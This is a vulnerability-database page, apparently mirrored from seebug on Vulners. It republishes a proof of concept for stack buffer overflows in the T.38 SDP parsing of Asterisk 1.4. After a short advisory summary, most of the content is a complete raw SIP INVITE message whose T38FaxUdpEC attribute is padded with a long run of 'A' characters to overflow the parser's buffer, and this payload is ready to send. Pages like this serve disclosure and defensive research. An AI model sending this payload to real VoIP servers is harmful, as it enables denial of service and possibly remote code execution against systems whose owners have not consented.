Lucene search
+L

Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (2)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 7 Views

Asterisk 1.4 SIP T.38 SDP - Remote Buffer Overflow vuln

Code

                                                source: http://www.securityfocus.com/bid/23648/info
 
Asterisk is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers.
 
Successful exploits may allow an attacker to execute arbitrary machine code to compromise an affected computer or to cause denial-of-service conditions.
 
Versions prior to Asterisk Open Source 1.4.3, AsteriskNOW Beta 6, and Asterisk Appliance Developer Kit 0.4.0 are vulnerable.
 
NOTE: These issues occur only when 't38 fax over SIP' is enabled in 'sip.conf'. 

INVITE sip:[email protected] SIP/2.0                                     
                                                                     
Date: Wed, 21 Mar 2007 4:20:09 GMT                                   
                                                                     
CSeq: 1 INVITE                                                       
                                                                     
Via: SIP/2.0/UDP                                                     
                                                                     
10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
                                                                     
User-Agent: NGS/2.0                                                  
                                                                     
From: "Barrie Dempster"                                              
                                                                     
<sip:[email protected]:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 
                                                                     
Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades               
                                                                     
To: <sip:200@localhost>                                              
                                                                     
Contact: <sip:[email protected]:5068;transport=udp>                   
                                                                     
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE            
                                                                     
Content-Type: application/sdp                                        
                                                                     
Content-Length: 796                                                  
                                                                     
Max-Forwards: 70                                                     
                                                                     
v=0                                                                  
                                                                     
o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1        
                                                                     
s=-                                                                  
                                                                     
c=IN IP4 127.0.0.1                                                   
                                                                     
t=0 0                                                                
                                                                     
m=image 5004 UDPTL t38                                               
                                                                     
a=T38FaxVersion:0                                                    
                                                                     
a=T38MaxBitRate:14400                                                
                                                                     
a=T38FaxMaxBuffer:1024                                               
                                                                     
a=T38FaxMaxDatagram:238                                              
                                                                     
a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    
                                                                     
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      
                                                                     
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      
                                                                     
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      
                                                                     
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      
                                                                     
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      
                                                                     
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      
                                                                     
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      
                                                                     
AAAAAAAAA                                        

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
7